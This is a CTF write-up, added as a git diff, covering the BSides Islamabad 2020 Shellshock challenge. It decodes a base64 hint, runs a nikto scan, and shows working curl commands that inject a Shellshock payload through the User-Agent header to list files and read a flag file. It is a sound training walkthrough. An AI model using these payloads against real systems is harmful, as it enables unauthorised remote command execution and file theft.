diff --git a/BsidesIslamabad 2020/Shellshock.md b/BsidesIslamabad 2020/Shellshock.md
new file mode 100644
index 0000000..cc7039e
--- /dev/null
+++ b/BsidesIslamabad 2020/Shellshock.md
@@ -0,0 +1,49 @@
+
+
+Looking at the source code we find base64 encoded text
+
+```
+Like the way you think spidey Y2dpLWJpbi90ZXN0LnNo
+```
+
+On decoding
+
+
+
+I did a `nikto` scan and found that this is vulnerable to `shellshock`
+
+
+I search on google about `cgi-bin` and found that they are mostly vulnerable to `shellshock` that allows execution of bash commands
+On refering to this blog post
+
+
+`https://wywyit.medium.com/ritsec-fall-2018-ctf-week-6-45d414035c76`
+
+
+I used
+
+```
+curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -type "*.txt"'" http://challenges.ctfd.io:30328/cgi-bin/test.sh
+```
+
+And it gave me a bunch of files
+
+
+
+At the bottom I found
+
+```
+/usr/lib/python3.8/LICENSE.txt
+/tmp/bash-4.3/doc/article.txt
+/tmp/bash-4.3/doc/fdl.txt
+/tmp/bash-4.3/examples/INDEX.txt
+/home/admin/root.txt
+/home/herman/user.txt
+```
+
+```
+Bsides Islamabad# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /home/herman/user.txt'" http://challenges.ctfd.io:30328/cgi-bin/test.sh
+
+Bsides-PK-Fl4g{sinister_six}
+```
+And that was our flag !